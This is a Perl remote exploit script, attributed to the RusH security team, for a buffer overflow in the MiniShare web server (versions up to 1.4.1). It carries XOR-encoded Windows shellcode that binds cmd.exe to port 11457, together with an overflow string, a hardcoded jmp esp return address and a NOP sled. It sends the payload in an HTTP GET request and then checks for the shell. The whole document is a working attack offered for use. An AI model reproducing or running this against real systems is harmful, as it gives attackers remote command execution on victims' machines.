#!/usr/bin/perl use IO::Socket; ## __________ ___ ___ ## \______ \__ __ ______/ | \ ## | _/ | \/ ___/ _ \ ## | | \ | /\___ \\ / ## |____|_ /____//____ >\___|_ / ## \/ \/ \/ ## MiniShare (http://minishare.sourceforge.net) version <=1.4.1 bof exploit ## tested on MiniShare version 1.4.1 and version 1.4.0 ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## this so simply and really not interesting for me but i need code this ## stuff for little work... i dont wanna insert many retrs for win-boxes ## if this xpl dont work on yours target - it's yours problems ## i dont wanna support kiddas... beeeee... ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (@ARGV < 2) { &usage; exit(); } $server = $ARGV[0]; $port = $ARGV[1] || 80; ## Windows port-bind shellcode , spawn cmd.exe on port 11457 , xored with 0x99 $shellcode = "\xEB\x0F\x5B\x80\x33\x99\x43\x81\x3B\x72\x35\x37\x2E\x75\xF4\x74\x05\xE8\xEC\xFF\xFF\xFF". "\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xE9\x91\xCF\xF1\x17\xD7\x97\x75". "\xF1\x76\x57\x79\xF9\xF1\x34\x40\x9C\x57\xF1\xEB\x67\x2A\x8F\xF1\x8E\x56\x1E\x49\xF1\x7E". "\xE0\x5F\xE0\xF1\x7C\xD0\x1F\xD0\xF1\x3D\x34\xB7\x70\xF1\x3D\x83\xE9\x5E\xF1\x40\x90\x6C". "\x34\xF1\x52\x74\x65\xA2\xCC\x10\x7C\xF3\x92\xC0\x19\x60\x9E\xED\xA9\x19\x60\x9F\xED\x8D". "\x66\xEC\xA9\x66\xED\x14\x99\x71\x42\x99\x99\x99\x10\xDD\x14\x99\x7B\x7D\x72\xB7\xC8\xF1". "\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\xCC\xB5\x10\xDC\xA9\xC0\xC0\xC0\x72\x4C\xC8". "\xF1\xEB\xED\x99\x99\xF1\xF4\xEA\xEF\xFA\xCD\x66\xCC\xB5\x10\xDC\xA9\xC0\xC0\xC0\x72\x27". "\xA8\x66\xFF\x18\x75\x09\x98\xCD\xF1\x98\x98\x99\x99\x66\xCC\x9D\xCE\xCE\xCE\xCE\xDE\xCE". "\xDE\xCE\x66\xCC\x91\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x99\xB5\x58\x10\x7F\xF3\x89\xCF\xCA". "\x66\xCC\x95\xCE\xCA\x66\xCC\x89\xCE\xCF\xCA\x66\xCC\x8D\x10\xDC\xA9\xCC\xCE\x72\x9C\x66". "\xCC\x85\x72\x77\x71\x6F\x66\x66\x66\x12\xED\xBD\x9D\x12\xC7\xA9\xF1\xFA\xF4\xFD\x99\x10". "\x7B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3\x8C\xC0\x6A\x32\x5F\xDD\xBD\x89\xDD\x67". "\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xA8". "\x66\xCE\xCE\xCE\xDE\xCE\xD6\xCE\xCE\xCB\xCE\x66\xCF\xB9\x10\x78\xF1\x66\x66\x66\x66\x66". "\xA8\x66\xCF\xBD\xCE\x66\xCF\x81\x66\xCF\xB1\xC8\xCF\x12\xED\xBD\x89\x12\xDF\xA5\x12\xCD". "\x9F\xE1\x98\x6B\x12\xD3\x81\x12\xC3\xB9\x98\x6A\x7A\xA1\xD0\x12\xAD\x12\x9A\xED\xBD\x89". "\xA8\x66\xA8\x59\x65\x35\x1D\x59\xED\x9E\x58\x56\x94\x98\x5E\x72\x6D\xA2\xE5\xBD\x95\xEC". "\x46\x12\xC3\xBD\x9A\xC5\xBD\x89\xFF\x12\x95\xD2\x12\xC3\x85\x9A\xC5\xBD\x89\x12\x9D\x12". "\x9A\xDD\xBD\x89\xC7\xC0\x5B\x91\x99\x72\x35\x37\x2E"; $nop_zone = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; $a = "A"x1787; $ret = 0x77593A43; ## winXP sp0 RU with patches shell32.dll jmp esp ## i hope you can found other retrs if you need $pack_ret = pack('l', ($ret)); $a .= $pack_ret; $a .= $nop_zone; $a .= $shellcode; print "[~] connecting to host $server port $port\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => $port) || die "[-] Connect failed\n"; print "[+] connected\n"; print "[~] sending shellcode\n"; print $socket "GET $a HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] shellcode sent\n"; sleep 2; close($socket); print "[+] socket closed\n"; print "[~] checking shell...\n"; ## check print "[~] trying connect to port 11457\n"; $socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => "11457", Photo => tcp) || die "[-] damn ... connect to spawn shell failed\n"; close($socket); print "[!] shell spawned on port 11457 ... you are lucky =)\n"; sub usage{ print qq{ ---------------------------------------- MiniShare ver <=1.4.1 remote b0f exploit by RusH security team // www.rst.void.ru ---------------------------------------- usage: r57minishare.pl [port] ---------------------------------------- * offset for winXP RU sp0 * shell32.dll jmp esp ---------------------------------------- }; }